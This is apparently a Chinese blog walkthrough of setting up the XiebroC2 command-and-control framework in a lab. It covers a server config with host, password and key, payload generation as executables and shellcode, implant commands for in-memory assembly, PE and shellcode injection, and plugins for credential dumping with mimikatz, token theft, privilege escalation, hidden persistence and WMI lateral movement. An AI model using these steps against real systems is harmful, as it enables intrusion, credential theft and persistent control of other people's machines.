XiebroC2 尝新

linxu 部署服务端./TeamServer64,-g profile.json 生成一个新文件

{
  "Banner": "3.2",
  "Host": "10.211.55.4",
  "wsPort": "8880",
  "Password": "123456",
  "Accouts": [ "admin", "User", "super" ],
  "StagerPort": "4050",
  "Telegram_Token": "",
  "Telegram_chat_ID": "",
  "Fork": true,
  "Route": "www",
  "AesKey": "QWERt_CSDMAHUATW",
  "Process64": "C:\\windows\\system32\\notepad.exe",
  "Process86": "C:\\Windows\\SysWOW64\\notepad.exe",
  "WebServers": [],
  "listeners": [],
  "proxys": [],
  "rdiShellcode32": "",
  "rdiShellcode64": "0xE8,0x00,0x00"

重点修改Host、Password、AesKey。而后启动。

Xf9KpL2QzR4wNmH8

XieBroC2 客户端就可以成功连接。客户端仅支持windows,每次启用连接都需要手动确认一次密码和key,否则服务端会出现错误。

image.png

webscript 用来生成powershell 代码

image.png

创建监听器

image.png
选项 本质 核心原理 主要特点
exe 独立的可执行文件 标准的 Windows 可执行文件(PE格式) 最通用,但特征最明显,极易被杀软查杀
raw (sRDI) 原始 Shellcode 将DLL转换为位置无关的Shellcode,由XiebroC2内置加载器执行 隐蔽性好,但文件体积较大仅支持64位
raw (donut) 原始 Shellcode 使用知名工具Donut生成Shellcode,可转换多种文件格式 灵活性高,但同样仅支持64位
elf 独立的可执行文件 Linux系统上的标准可执行文件格式 运行在Linux目标上
darwin 独立的可执行文件 macOS系统上的标准可执行文件格式 运行在macOS目标上

amd64 ,目标 Windows 或 Linux 服务器,绝大多数情况是 amd64。
arm64,其他

在点击生成以后,文件在服务端

image.png

上线以后help可查看命令帮助

image.png
nps,在内存中执行powershell命令
Inline-assembly,加载.net程序集时无需进程
execute-assembly,跨进程加载.net程序集,属于传统方式容易被检测
Inline-Execute,在当前会话的进程空间内直接加载并执行 PE 文件
Runpe,跨进程加载PE,包括C/C++/Go/Rust编写的程序
RunShellcode, C:\Windows\beacon.bin 加载第三方shellcode
bin-injection, 注入shellcode到指定进程
memfd root\home\fscan -h 192.168.1.1/24 linux下无文件内存执行

下载https://github.com/INotGreen/Xiebro-Plugins 插件以后可直接使用。

fscan无法使用,还会导致服务端报错 Unhandled exception. System.Exception: Failed to read loader ,经过改良以后fscan还没有加载出来,木马过量占用cpu,测试其他命令正常

工具 描述
mimikatz 从内存中提取明文密码、哈希、PIN 码和 Kerberos 票证
RegHide 添加隐藏注册表启动项
SharpKatz mimikatz的C#版本,用于获取明文密码和dcsync
SharpScan 内网资产收集、探测主机存活、端口扫描、域控定位、文件搜索、密码爆破和账号枚举
SharpToken Token窃取,切换System和administrator权限,用于提权降权场景
SweetPotato 将服务器权限提升至System权限
SharpWMI 基于135端口的横向移动工具,可以执行命令,上传文件
BadPotato 将服务器权限提升至System权限
GodPotato 将服务器权限提升至System权限
inline-execute E:\secure\c2\tools\fscan.exe -h 10.211.55.3 -o C:\Windows\Temp\result.txt
可以成功
Inline-Execute-Bin E:\secure\c2\tools\fscan.bin -h 10.211.55.3 -o C:\Windows\Temp\result.txt
适用于没有参数的shellcode
RunPE E:\secure\c2\tools\fscan.exe -h 10.211.55.3 -o C:\Windows\Temp\result.txt
测试也不成功,不知道是不是我方法有问题。

颜色变红,为下线状态。

image.png
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容